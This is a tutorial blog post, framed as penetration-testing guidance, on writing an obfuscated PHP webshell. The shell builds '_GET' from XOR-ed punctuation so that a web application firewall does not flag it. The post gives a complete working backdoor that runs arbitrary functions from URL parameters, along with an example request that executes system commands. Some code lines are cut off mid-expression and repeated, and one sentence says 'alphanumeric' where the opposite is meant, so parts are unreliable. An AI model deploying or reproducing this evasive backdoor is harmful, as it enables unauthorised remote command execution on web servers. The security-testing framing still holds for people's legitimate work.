Writing Simple PHP Non-Alphanumeric Backdoor to Evade WAF

Penetration Testing with Simple PHP Non-Alphanumeric Backdoor

Penetration testing or pen test is the practice of testing a computer system, network or web application to find security vulnerabilities that an attacker could exploit and done by IT security team. As IT security team, we have to master various pen test tools and methods to gain an effective pen test. In this article, we will learn a technique about how to do pen test by evading WAF with simple PHP non-alphanumeric backdoor.

When we do a pen test in web application, the first thing we do is identifying and exploiting the vulnerabilities that might exist in the web application. After that, we will upload a backdoor on the vulnerabilities to gain more access from it. Normally, we often write famous and most used webshell that includes numbers and letter like b374k, r57, c99, etc.

However, in several cases, in the system of target they use a Web Application Firewall (WAF) to protect their application. This WAF is designed to block malicious code from the webshell that includes numbers and letter as mentioned before. In order to bypass this restriction caused by the WAF, we will create a simple non-alphanumeric PHP code which contains a simple backdoor that doesn’t include any malicious word like system, shell_exec, eval, etc.

Before we execute the pen test, first, we need to understand about XOR operations, because we will use the XOR to refer each character on this script. For example, we will use { as key.

1
2

>> "_" ^ "{"
=> "$"


From the simple operation above, we can see that when we combine XOR _ with { , it will turn into $ as the result. We will use this method for each character and create a tiny and stealth alphanumeric backdoor.

1
2
<?php
  $_GET[f]($_GET[p]);

From this simple backdoor script, we will gain the code that shows f as function and p as parameter. After that, you can use one of the codes to execute several commands such as whoami command. To execute whoami command, we just need to make a f=system&p=whoami request.

Once we gain a plain backdoor, we will be XOR-ing each character with random non-alphanumeric character. It works like this:

1
2
3
4
5
6
7
8
<?php
 
  $_ = "]" ^ ";"; // returned f
  $__ = "." ^ "^"; // returned p
  $___ = "|" ^ "#"; // returned _
  $___ .= ":" ^ "}"; // returned _G
  $___ .= "~" ^ ";"; // returned _GE
  $___ .= "{" ^ "/"; // returned _GET

 Once we have fully alphanumeric “GET” string as the result for our backdoor. Put the result in one-liner code execution and done. 

1$___ = $___ = ("|" ^ "#") . (":" ^ "}") . ("~" ^ ";") . ("{" ^ "

Then, we input the last code 

1$___ = $___ = ("|" ^ "#") . (":" ^ "}") . ("~" ^ ";") . ("{" ^ "
Finally, our final code will be looked like this: 
1
2
3
4
5
<?php
 
  $_ = "]" ^ ";"; $__ = "." ^ "^";
  $___ = ("|" ^ "#") . (":" ^ "}") . ("~" ^ ";") . ("{" ^ "/");
  ${$___}[$_](${$___}[$__]);
To execute a command from backdoor, just simply parse p and f parameter from the URL, for example: http://localhost/simplebd.php?f=system&p=whoami

As we know, information security is one of the most crucial things but very complicated to do. That is why, Defenxor as an IT security expert, hopes this simple method of writing simple PHP non-alphanumeric backdoor will be helpful and useful for your penetration test practice and you can ensure that your company’s website application is safe from any hacking attempts.